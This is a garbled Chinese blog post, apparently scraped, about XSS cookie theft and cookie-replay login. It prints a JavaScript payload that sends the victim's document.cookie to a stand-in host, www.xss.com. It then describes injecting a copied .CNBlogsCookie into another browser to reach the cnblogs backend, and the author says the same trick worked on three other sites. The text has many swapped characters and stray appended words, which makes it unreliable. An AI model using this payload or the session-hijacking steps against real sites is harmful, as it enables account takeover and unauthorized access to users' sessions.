经过COOKIE欺骗登陆网站后台

1.今天闲着没事看了看关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)的知识,xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击相似,SQL注入攻击中以SQL语句做为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,经过插入恶意脚本,实现对用户游览器的控制,CSRF全名是Cross-site request forgery,是一种对网站的恶意利用,CSRF比XSS更具危险性。其实XSS攻击就是网站输入框没有限制非法字符,或者没有对脚本内容进行编码致使的!html

 

var img = document.createElement('img');
img.src='http://www.xss.com?cookie='+document.cookie;
img.style.display='none';
document.getElementsByTagName('body')[0].appendChild(img);

 

好比这段代码,当咱们没有对网站输入框进行非法字符的限制的话,用户输入了这段脚本,这样就会神不知鬼不觉的把当前用户的cookie发送给了个人恶意站点,个人恶意站点经过获取get参数就拿到了用户的cookie。固然咱们能够经过这个方法拿到用户各类各样的数据。chrome

 

 

2.固然我今天说的主要不是这些,而是经过你拿到的cookie,植入到你的浏览器中而后就能够访问网站后台了,下面我来为你们演示一遍,如何经过已存在的Cookie,进入博客园后台,我用IE浏览器和Chrome浏览器来测试!浏览器

首先咱们经过IE浏览器拿到咱们登入博客园后的Cookie,经过IECookiesview插件能够查看到IE浏览器下全部的Cookie信息,而后咱们找到cnblogs.com站点下的Cookie,而后复制下.CNBlogsCookie和key和value值,如图所示! 安全

 

3.众所周知,cookies属于隐私数据,不一样浏览器保存在不一样地方。不可能共享的,此时咱们再次打开Chorme浏览器,如图IE浏览器为登陆状态,而chorme浏览器为未登陆状态cookie

 

 

4.那么此时咱们就将刚拷贝的IE浏览器下博客园的cookie数据植入到chrome浏览器中,实现cookie欺骗登陆到博客园后台,在chrome浏览器中添加cookies扩展程序,方便写入和删除cookieapp

 

 

5.而后打开cookies插件,咱们就找到cnblogs.com下的cookie,默认没有登陆的时候是没有.CNBlogsCookie这个cookie的, 而后咱们点击添加一个cookie,将.CNBlogsCookie和key和value值写入进去,再刷新网站页面,成功进入博客园网站后台!  xss

 

 

6.若是将这个方法,再结合到开始讲的XSS攻击的话获取到别人网站的cookie信息,那么黑进别人网站的后台就很容易了,我本身也试了三个网站,都是能够成功进入的! 固然我说这些不是为了让你们黑别人的网站,只是只有弄懂了这些,才能更好的防范,保证本身开发的网站的安全! post

 

出处:https://www.cnblogs.com/MR-YY/p/5259178.html测试

相关文章
相关标签/搜索